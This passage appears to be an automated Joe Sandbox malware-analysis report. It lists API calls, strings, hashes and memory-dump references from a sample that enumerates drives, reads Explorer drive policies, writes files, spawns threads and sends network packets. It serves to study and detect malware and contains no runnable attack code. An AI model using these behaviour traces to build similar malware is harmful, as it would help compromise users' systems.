                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                              • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                              • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                              • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: device$deviceType
                                                                                                                                                                                              • API String ID: 1602765415-3511266565
                                                                                                                                                                                              • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeStringlstrcmpi
                                                                                                                                                                                              • String ID: service$serviceType
                                                                                                                                                                                              • API String ID: 1602765415-3667235276
                                                                                                                                                                                              • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 442028454-507759092
                                                                                                                                                                                              • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                              • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                              • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                              • API String ID: 1447977647-3252725368
                                                                                                                                                                                              • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                              • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • NoDrives, xrefs: 00406458
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                              • API String ID: 2666887985-3471754645
                                                                                                                                                                                              • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                              • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2251373460-0
                                                                                                                                                                                              • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3488799664-0
                                                                                                                                                                                              • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                              • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl_aullshr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 673498613-0
                                                                                                                                                                                              • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                              • String ID: pdu
                                                                                                                                                                                              • API String ID: 2164660128-2320407122
                                                                                                                                                                                              • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                              • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3102160386-507759092
                                                                                                                                                                                              • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                              • String ID: pdu$.#v
                                                                                                                                                                                              • API String ID: 309973729-1687148394
                                                                                                                                                                                              • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                              • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeviceDriveQueryType
                                                                                                                                                                                              • String ID: ?c@$\??\
                                                                                                                                                                                              • API String ID: 1681518211-744975932
                                                                                                                                                                                              • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3966618661-0
                                                                                                                                                                                              • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                              • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                              • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 435966717-0
                                                                                                                                                                                              • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 2064604595-507759092
                                                                                                                                                                                              • Opcode ID: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
